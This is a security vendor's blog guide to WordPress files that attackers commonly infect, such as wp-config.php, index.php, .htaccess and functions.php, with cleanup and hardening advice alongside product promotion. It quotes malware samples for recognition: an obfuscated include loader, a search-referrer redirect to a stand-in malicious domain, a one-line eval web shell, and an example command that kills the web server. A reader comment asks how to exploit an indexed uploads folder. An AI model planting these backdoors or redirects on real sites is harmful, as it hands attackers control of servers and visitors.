911 Hack Removal

How to Scan & Fix Infected WordPress Files(wp-config.php and wp-content/uploads)

Updated on: February 3, 2022

How to Scan & Fix Infected WordPress Files(wp-config.php and wp-content/uploads)

WordPress has made building websites super easy and has enabled individuals and organizations of any size to have an online presence.

When hosting your WordPress website, taking care its security is essential. The last thing you want to happen is to wake up in the morning and find your website is hacked and all your development and SEO efforts went down in the drain with you having no knowledge of it 🙁

Because of its popularity, hackers tend to target WordPress along with its themes & plugins. If they find a vulnerability in one plugin, they would easily be able to exploit almost all the websites having that plugin installed.

Related Guide – WordPress Malware Removal

Take the recent vulnerability in Contact Form 7 plugin as an example. It is estimated that over 5 million websites using Contact Form WordPress plugin were left vulnerable after the vulnerability came to light. The flaws in the plugins allowed attackers to simply upload files of any type, bypassing all restrictions placed regarding the allowed upload-able file types on a website. Further, it allowed an attacker to inject malicious content such as web shells into the sites that are using the Contact Form 7 plugin version below 5.3.1 and have file upload enabled on the forms.

Similarly, there was an LFI vulnerability in the ‘Slider Revolution’ plugin which made it possible for hackers to download wp-config.php from the vulnerable WordPress sites. This led to the leak of database credentials, encryption keys, and other sensitive configuration information about a website. This started being referred to as the wp-config.php hack.

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Website Protection before it is too late.

In this guide, we’ll talk about all the important files and locations on your WordPress site that may have been a target of hackers & malware.

1) WordPress wp-config.php Hack

The wp-config.php is an important file for every WP installation. It is the configuration file used by the site and acts as the bridge between the WP file system and the database. The wp-config.php file contains sensitive information such as:

  • Database host
  • Username, password, & port number
  • Database name
  • Security keys for WordPress
  • Database table prefix

Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)

Owing to its sensitive nature, it is a popular target amongst hackers. Last year, a critical flaw was found in the WP plugin Duplicator. There was Unauthenticated Arbitrary File Download vulnerability which let hackers download the wp-config file.

Once hackers get hold of the database login details via the wp-config.php hack, they try to connect to the database and create fake WP admin accounts for themselves. This gives them full access to a website and the database. Sensitive data such as — user passwords, email ids, files, images, WooCommerce transaction details, and so on are exposed to the hacker. To have continued access to your WordPress site, they may also install scripts such as the Filesman backdoor.

wp-config.php file hack
How to repair a hacked WordPress website

2) WordPress index.php Hacked

The index.php file is the entry point to every WordPress site. Since this gets to run with every page on your site, hackers inject malicious code which affects your whole website.

For instance, the pub2srv malware & Favicon malware hack target index.php filesResearchers at Astra Security were monitoring this large spread malware redirection campaign, and saw that malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; and the code in the screenshot below was added to the index.php files:

wp index php hack
Malicious code found to be inserted in the index.php file of a WordPress installation

Some malware campaigns also rename the index.php file to index.php.bak and have caused the website to crash and not load at all.

Such malicious code in the index.php file can cause website visitors to see strange popups, ads, or even being redirected to other spammy sites. To fix such a hack, compare the contents of this file with the original copy released by WordPress.

Related Guide – The Ultimate WordPress hack removal guide

3) WordPress .htaccess File Hacked

The .htaccess file often found in your WordPress website’s home location, helps configure the server settings as per the website’s requirement. This is often found in Apache servers. The .htaccess file is a very powerful component to control your web server’s performance and behavior. It can also be used to control the security of your website. Some common uses of the .htaccess file are:

  • Restrict access to certain folders of the site
  • Configure the maximum memory usage of the site
  • Create Redirects
  • Force HTTPS
  • Manage Caching
  • Prevent a few script injection attacks
  • Control maximum file upload sizes
  • Stop bots from finding usernames
  • Block image hotlinking
  • Force automatic downloads of files
  • Manage file extensions

However, when under attack, these features can be used to harvest clicks for the attacker. Often, the.htaccess file is injected with malicious code to redirect users. Sometimes it is used to display spam to users. For instance look at the code given below:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
 RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The malicious code in the last line is redirecting the user traffic from the site.  As a result, the users are redirected to http://MaliciousDomain.tld. Then, it tries to load the bad.php script. If you notice unusual redirect from your site, it is possible due to the .htaccess file hack. However, if you don’t find the file, or if it’s empty – do not panic as this file is not mandatory (unless you are using pretty URLs in WordPress).

Each WordPress theme has a file called footer.php and header.php which has the code for the footer and header of the site. This area includes scripts & certain widgets which remain the same throughout the website. For example, the share widget or the social media widgets at the bottom of your website. Or at times it could be just copyright info, credits, etc.

So, these two files are important files that can be targeted by the attackers. It is often used for malware redirects and displaying spam content as was the case with the digestcolect[.com] Redirect Malware.

Hacked sites might contain gibberish code in these files as you can see in the screenshot below:

Wordpress header.php hack
An example of gibberish inserted into header.php file

We decoded some of this and found hackers leveraging browser cookies to identify users and show them malicious advertisements etc.

Moreover, in another instance, the attackers injected JavaScript codes into all files with a .js extension. Because of the large scale infection, it often becomes difficult to clean such hacks.

Get the ultimate WordPress security checklist with 300+ test parameters

5) WordPress functions.php Hacked

The functions file within the theme folder behaves as a plugin would. Which means, it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used for:

  • Calling WordPress events/functions
  • To call native PHP functions.
  • Or to define your own functions.

The functions.php file is present with every theme, but it is important to note that at any given time, only one functions.php file is executed – the one in the active theme. Because of this, the functions.php files were actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages in the site such as the Pharma and Japanese SEO spam.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As is evident from the code above, this file includes class.theme-modules.php file. This file is then used to install malware into other themes installed on your site (even if they are disabled). Thus creating new users and backdoors. This allowed attackers to access the site even after the file is cleaned up.

Secure your WordPress website before hackers try to hack it!

Astra Website Protection has helped thousands of WordPress sites prevent cyberattacks.

6) WordPress wp-load.php Hacked

The wp-load.php is an important file for every WordPress site. The wp-load.php file helps in bootstrapping the WordPress environment and gives plugins the ability to use the native WP core functions. Many of the malware variants infect WordPress sites by creating malicious wp-load files as was seen in the case of China Chopper Web shell malware. This typical behavior was to create files like wp-load-eFtAh.php on the server. Since the name resembles the original file’s name, you may not have found it suspicious when logged in to FTP. These files would contain codes such as:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code on the site which is sent by the hackers in the pass parameter. Using this backdoor, harmful commands could be executed. For instance, the command — http://yoursite/your.php?pass=system("killall -9 apache"); could kill the webserver processes. This can shut down the entire server. Don’t judge this code by its length – it is dangerous enough to control your server remotely.

7) Flood of class-wp-cache.php Files on the Server

In one of the recent hacks, we’ve seen is cPanel and entire web server getting dozens or even thousands of class-wp-cache.php files. Every folder of the website including the core files is infected with these malicious files. Usually, the cause of this infection is a vulnerability in the website code opening up an inlet for hackers.

How to Perform a WordPress Files Cleanup & Secure them

1) Cleaning files

Firstly, investigate the causes of attacks like the wp-config.php hack. Then remove the malicious/gibberish code. Secondly, restore the infected files from a backup that you may have. In case the backup is unavailable you can check out the original WordPress files in GitHub. Don’t forget to keep a backup of the files before you make any changes. Any mistake in the code removal process can potentially break your site.

2) Securing the site using plugins

With such hacks, core CMS files are often modified by hackers. It is important to check if any of your core WordPress files are modified. Astra Security customers already have this feature and are notified automatically if any such changes are detected.

Core-file change detection in Astra’s Malware Scanner

Astra Security also provides an inbuilt review mechanism for reviewing these files changes.

File difference checker - Astra Security
File difference checking, screenshot from Astra’s malware scanner.

After you’ve reviewed the changes in core system files, you would have to scan your site with a Malware Scanning solution such as Astra Website Protection to identify files with malicious content in them. Such tools give you a full scan report of the malware files, malicious links, reasons for the hack, etc.

3) Hide sensitive files

Exposing files to prying eyes can reveal sensitive info like we talked about the wp-config.php hack in this article. Therefore, it becomes necessary to hide these files on the server. The .htaccess file can help in securing these files.

To prevent anyone from accessing any PHP files in the wp-content/uploads folder, you can create an .htaccess file in the wp-content/uploads folder and add the following code to it:

# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all

To hide sensitive files in the wp-includes folder, add the following code to the .htaccess file in the root of your site:

# Block wp-includes folder and files
 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]

You can also choose to skip this entire process and just install the WP Hardening Plugin. This plugin hides sensitive files such as wp-contents, wp-uploads, etc. with just a toggle of a button. Adding to this WP-Hardening also helps in securing several other important security areas in your website, making it hard for attackers to identify sensitive information and exploit it.

Related Guide – Step by Step Guide to WordPress Malware Removal

4) Updating WordPress

Always keep your WP installation, its plugins, and themes up to date. A good number of the loopholes can be plugged by running an updated installation. Use the reputed plugins and themes only. Avoid poorly coded or nulled themes. This would keep attacks like the wp-config.php hack at bay.

To explain this better, we created a complete step by step video to secure your WordPress site:

5) Use a WordPress Firewall

A firewall goes a long way in securing your site. A firewall can monitor the incoming traffic on your site and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra Security is flexible and suitable for your needs.

How Web Application Firewall works
How Astra Web Application Firewall protects you

The Astra firewall stops attacks such as SQLi, code injection, XSS, CSRF, and 100+ other cyber threats in real-time. It also detects and blocks unusual and fake logins to your instance and scans your website automatically and regularly.

6) WordPress Security Audit or Pen testing

With WordPress being the most popular CMS in usage and thus a place for increased security issues, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, Pen-Testing a WordPress site has become essential in order to keep it secure from attacks.

Penetration Testing is a simulated attack performed against a web application, network, or computer system to evaluate its security and find any vulnerabilities it has prior to an attacker thus helping in protecting it. One of the different simulated attacks carried out while Pen-Testing a WordPress site would be to check for Directory Listing vulnerability that basically indexes sensitive directories such as wp-includes, wp-index.php,  wp-config.php, wp-admin, wp-load.php, wp-content, etc. and could thus provide an attacker with sensitive information.

Fix 12+ security issues with a click using our Free WP Hardening Plugin

WP Hardening plugin

Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)

Tags: , , , , ,

Shikhil Sharma

Shikhil Sharma is the founder & CEO of Astra Security. Being involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football. Astra Security has been rewarded at Global Conference on Cyber Security by PM of India Mr. Narendra Modi. French President Mr. François Hollande also rewarded Astra under the La French Tech program. Astra Security is also a NASSCOM Emerge 50 company.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Newest Most Voted
Inline Feedbacks
View all comments

[…] Check our detailed blog on Commonly Hacked WordPress files and How it affects your WordPress Website. […]

Hendrick Laama
Hendrick Laama
4 years ago

Hello really post, please i have a question. How can i exploit a wordpress that wp-content/upload indexing is enabled?

Sai Krishna
4 years ago
Reply to  Hendrick Laama
adesh kumar
adesh kumar
2 years ago

Hello, I am not sure what’s going on, so im seeking your help. When logging on through the admin panel, I am able to see my dashboard, however i am unable to edit or click on any other link within the dashboard, this give me a page not found message. I’ve looked possible solutions such as updating the .htaccess file From <FilesMatch “.*\.(phtml|php)$”> Order Allow,Deny Deny from all </FilesMatch> <FilesMatch “(index).php$”> Order Allow,Deny Allow from all </FilesMatch> To <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> this… Read more »

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany